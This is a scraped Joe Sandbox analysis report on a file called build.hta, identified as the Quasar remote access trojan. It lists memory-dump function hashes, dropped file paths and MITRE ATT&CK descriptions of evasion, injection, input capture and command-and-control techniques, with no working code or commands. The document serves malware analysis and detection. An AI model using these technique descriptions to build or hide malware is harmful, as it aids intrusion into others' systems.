Memory Dump Source

Source File: 00000009.00000002.2970704506.0000000006630000.00000040.00000800.00020000.00000000.sdmp, Offset: 06630000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_6630000_csc.jbxd

Similarity

API ID: DeleteFile
String ID:
API String ID: 4033686569-0
Opcode ID: 82f5864d4675015f9c550fd1082aff846403fe8f24b61812ebd66614fb587810
Instruction ID: 6200435231e4bac9a5fac2e810369bf4676df65e2cd3ebc04e44711b99150b86
Opcode Fuzzy Hash: 82f5864d4675015f9c550fd1082aff846403fe8f24b61812ebd66614fb587810
Instruction Fuzzy Hash: E331EFB0C043999FCB11DFA9C95469EFFB0EF49310F04819AD884A7292C738A805CBA1

Function 0AE44870 Relevance: 1.5, APIs: 1, Instructions: 46comCOMMON

Download Yara Rule

APIs

OleInitialize.OLE32(00000000), ref: 0AE4588D

Memory Dump Source

Source File: 00000009.00000002.2974247838.000000000AE40000.00000040.00000800.00020000.00000000.sdmp, Offset: 0AE40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_ae40000_csc.jbxd

Similarity

API ID: Initialize
String ID:
API String ID: 2538663250-0
Opcode ID: 5ed28cd4aebf68192e1fdabfa6c1714a4b479ae1fc754dc07b576330847f7558
Instruction ID: 83917ebfdd5b387e7f218a208091672c18f2740c45641a22bf0394ebfe9386a3
Opcode Fuzzy Hash: 5ed28cd4aebf68192e1fdabfa6c1714a4b479ae1fc754dc07b576330847f7558
Instruction Fuzzy Hash: E71115B59003488FCB20DF9AD544BDEFBF8EB48324F108469D559A7210D775A944CFA5

Function 0AE45830 Relevance: 1.5, APIs: 1, Instructions: 45comCOMMON

Download Yara Rule

APIs

OleInitialize.OLE32(00000000), ref: 0AE4588D

Memory Dump Source

Source File: 00000009.00000002.2974247838.000000000AE40000.00000040.00000800.00020000.00000000.sdmp, Offset: 0AE40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_ae40000_csc.jbxd

Similarity

API ID: Initialize
String ID:
API String ID: 2538663250-0
Opcode ID: 16417187d12edb8bb19b9232b44a7420ad29c2181a2bfaa9d4830fb77244f87e
Instruction ID: c25543a068d5d8b33f5580c73dfeb13bbe4d8914666761e52a6ec227fc988287
Opcode Fuzzy Hash: 16417187d12edb8bb19b9232b44a7420ad29c2181a2bfaa9d4830fb77244f87e
Instruction Fuzzy Hash: C11142B0D002488FCB20DFAAD585BDEFFF4EB48324F20842AD559A7250C738A944CFA4

Function 064FD4D8 Relevance: .1, Instructions: 75COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.2970226469.00000000064FD000.00000040.00000800.00020000.00000000.sdmp, Offset: 064FD000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_64fd000_csc.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fe26d79867d2b0b1faa8d6033f17264ef8a557b039aee74ff516a7a56fe9ecdc
Instruction ID: a41bc457843c196461dfd24a9fddc0c22817215b2c19b8cef44d39ec531a5a74
Opcode Fuzzy Hash: fe26d79867d2b0b1faa8d6033f17264ef8a557b039aee74ff516a7a56fe9ecdc
Instruction Fuzzy Hash: B9212571910204DFDB45DF14D9C4B27BFA5FF88318F20856AEA094B356C336D456CAA2

Function 064FD3EC Relevance: .1, Instructions: 75COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.2970226469.00000000064FD000.00000040.00000800.00020000.00000000.sdmp, Offset: 064FD000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_64fd000_csc.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d7dd706694cb08c14d9b32d0465cd7db7dd589c8cb02eb490dc4abe586b5c179
Instruction ID: 2000ddc7541083b3165b55b4bcf9780de71c88d45940d68bbbe1e01fa69f5849
Opcode Fuzzy Hash: d7dd706694cb08c14d9b32d0465cd7db7dd589c8cb02eb490dc4abe586b5c179
Instruction Fuzzy Hash: 82212571910200DFDB45DF14D9C0B27BF65FF98324F20C66AEA090B356C336E456C6A2

Function 0650D208 Relevance: .1, Instructions: 72COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.2970330278.000000000650D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0650D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_650d000_csc.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 311b7a252277b27df6d5acf71f9b0e12e30b5d214dc7fa4f7d9810ee14026160
Instruction ID: 06686d2d493f1c00f70c7749d25394e0a00d86b03b7d7256bf9edee7ad0c15f0
Opcode Fuzzy Hash: 311b7a252277b27df6d5acf71f9b0e12e30b5d214dc7fa4f7d9810ee14026160
Instruction Fuzzy Hash: D2213471A00205DFEB40DF94D9C4B26BBB5FF84314F20CA6DE8094B296C37AD446CAA1

Function 064FD4D3 Relevance: .1, Instructions: 56COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.2970226469.00000000064FD000.00000040.00000800.00020000.00000000.sdmp, Offset: 064FD000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_64fd000_csc.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 201b50b495cf87aa99c5283e85c62261d36f592a674eeeb3b47fc5aac64b1fd2
Instruction ID: 7aaf183effff92fb62f0714472758320810008c5a52d3ee3b9704032d25a8de0
Opcode Fuzzy Hash: 201b50b495cf87aa99c5283e85c62261d36f592a674eeeb3b47fc5aac64b1fd2
Instruction Fuzzy Hash: 8F11AF76914240CFCB16CF14D5C4B16BF71FF94318F24C6AAD9090B256C33AD45ACBA2

Function 064FD3E7 Relevance: .1, Instructions: 56COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.2970226469.00000000064FD000.00000040.00000800.00020000.00000000.sdmp, Offset: 064FD000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_64fd000_csc.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 201b50b495cf87aa99c5283e85c62261d36f592a674eeeb3b47fc5aac64b1fd2
Instruction ID: f7f4864e01730ffd48af126f3704f3dccd68f4b20e45141eaa088984c829dae1
Opcode Fuzzy Hash: 201b50b495cf87aa99c5283e85c62261d36f592a674eeeb3b47fc5aac64b1fd2
Instruction Fuzzy Hash: 2211AF76904240DFDB06CF10D9C4B16BF62FF94324F24C6AAD9090B656C33AE45ACBA2

Function 0650D203 Relevance: .1, Instructions: 53COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.2970330278.000000000650D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0650D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_650d000_csc.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 48042a67946fd5b471a152cae87ddc5a96e5ad52caa5f07da488830fbc7c129d
Instruction ID: 650084288a884c1460228dbc351192138d931a19482579b62a3734961da46059
Opcode Fuzzy Hash: 48042a67946fd5b471a152cae87ddc5a96e5ad52caa5f07da488830fbc7c129d
Instruction Fuzzy Hash: 2011A976904284CFDB02CF54D984B15BBB1FB84324F28C6AAD8094B296C33AD44ACF61

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Image: Image Metadata, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Scheduled Job: Scheduled Job Metadata, Scheduled Job: Scheduled Job Modification, Service: Service Creation, Service: Service Metadata
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify and/or disable security tools to avoid possible detection of their malware/tools and activities. This may take many forms, such as killing security software processes or services, modifying / deleting Registry keys or configuration files so that tools do not operate properly, or other methods to interfere with security tools scanning or reporting information. Adversaries may also disable updates to prevent the latest security patches from reaching tools on victim systems.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, Driver: Driver Load, Process: Process Creation, Process: Process Termination, Sensor Health: Host Status, Service: Service Metadata, Windows Registry: Windows Registry Key Deletion, Windows Registry: Windows Registry Key Modification
Platforms:	Containers, IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may set files and directories to be hidden to evade detection mechanisms. To prevent normal users from accidentally changing special files on a system, most operating systems have the concept of a ‘hidden’ file. These files don’t show up when a user browses the file system with a GUI or when using normal commands on the command line. Users must explicitly ask to show the hidden files either via a series of Graphical User Interface (GUI) prompts or with command line switches ( `dir /a` for Windows and `ls –a` for Linux and macOS).
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	File: File Metadata
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use methods of capturing user input to obtain credentials or collect information. During normal system usage, users often provide credentials to various different locations, such as login pages/portals or system dialog boxes. Input capture mechanisms may be transparent to the user (e.g. Credential API Hooking ) or rely on deceiving the user into providing input into what they believe to be a genuine service (e.g. Web Portal Capture ).
Tactics:	Collection, Credential Access
Data Sources:	Driver: Driver Load, File: File Modification, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Windows Registry: Windows Registry Key Modification
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may gather the system time and/or time zone from a local or remote system. The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Firewall: Firewall Enumeration, Firewall: Firewall Metadata, Process: OS API Execution, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may look for details about the network configuration and settings, such as IP and/or MAC addresses, of systems they access or through information discovery of remote systems. Several operating system administration utilities exist that can be used to gather this information. Examples include Arp , ipconfig / ifconfig , nbtstat , and route .
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may target user email to collect sensitive information. Emails may contain sensitive data, including trade secrets or personal information, that can prove valuable to adversaries. Adversaries can collect or forward email from mail servers or clients.
Tactics:	Collection
Data Sources:	Application Log: Application Log Content, Command: Command Execution, File: File Access, Logon Session: Logon Session Creation, Network Traffic: Network Connection Creation
Platforms:	Google Workspace, Linux, macOS, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using a protocol and port pairing that are typically not associated. For example, HTTPS over port 8088or port 587as opposed to the traditional port 443. Adversaries may make changes to the standard port used by a protocol to bypass filtering or muddle analysis/parsing of network data.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may use legitimate desktop support and remote access software to establish an interactive command and control channel to target systems within networks. These services, such as `VNC`, `Team Viewer`, `AnyDesk`, `ScreenConnect`, `LogMein`, `AmmyyAdmin`, and other remote monitoring and management (RMM) tools, are commonly used as legitimate technical support software and may be allowed by application control within a target environment.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp . Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer ).
Tactics:	Command and Control
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report build.hta

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Threatname: Quasar

Yara Signatures

Memory Dumps

Unpacked PEs

Sigma Signatures

System Summary

Snort Signatures

Joe Sandbox Signatures

AV Detection

Compliance

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

E-Banking Fraud

System Summary

Data Obfuscation

Persistence and Installation Behavior

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

Private

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Users\user\AppData\Roaming\Logs\06-08-2024

C:\Users\user\Desktop\build.exe

\Device\ConDrv

Static File Info

General

Network Behavior

Snort IDS Alerts

Network Port Distribution

TCP Packets

UDP Packets

DNS Queries

DNS Answers

HTTP Request Dependency Graph

Windows Analysis Report
build.hta

Function 0041CABA Relevance: 42.3, APIs: 1, Strings: 23, Instructions: 298
memoryCOMMON

Function 0041CD00 Relevance: 26.8, APIs: 1, Strings: 14, Instructions: 549
memoryCOMMON

Function 0041D257 Relevance: 26.5, APIs: 1, Strings: 14, Instructions: 233
memoryCOMMON

Function 004166E1 Relevance: 23.1, APIs: 1, Strings: 12, Instructions: 305
COMMON

Function 00417331 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 68
COMMON

Function 004070F4 Relevance: 1.8, APIs: 1, Instructions: 250
memoryCOMMON

Function 0041715A Relevance: 1.7, APIs: 1, Instructions: 188
nativeCOMMON

Function 00417194 Relevance: 1.7, APIs: 1, Instructions: 173
COMMON

Function 00417392 Relevance: 1.6, APIs: 1, Instructions: 150
nativeCOMMON

Function 00417150 Relevance: 1.6, APIs: 1, Instructions: 146
nativeCOMMON

Function 004066DB Relevance: 22.9, APIs: 1, Strings: 12, Instructions: 193
memoryCOMMON

Function 0041D991 Relevance: 21.1, APIs: 1, Strings: 11, Instructions: 120
memoryCOMMON

Function 0041FFB3 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 285
COMMON

Function 0041F810 Relevance: 1.7, APIs: 1, Instructions: 218
COMMON

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre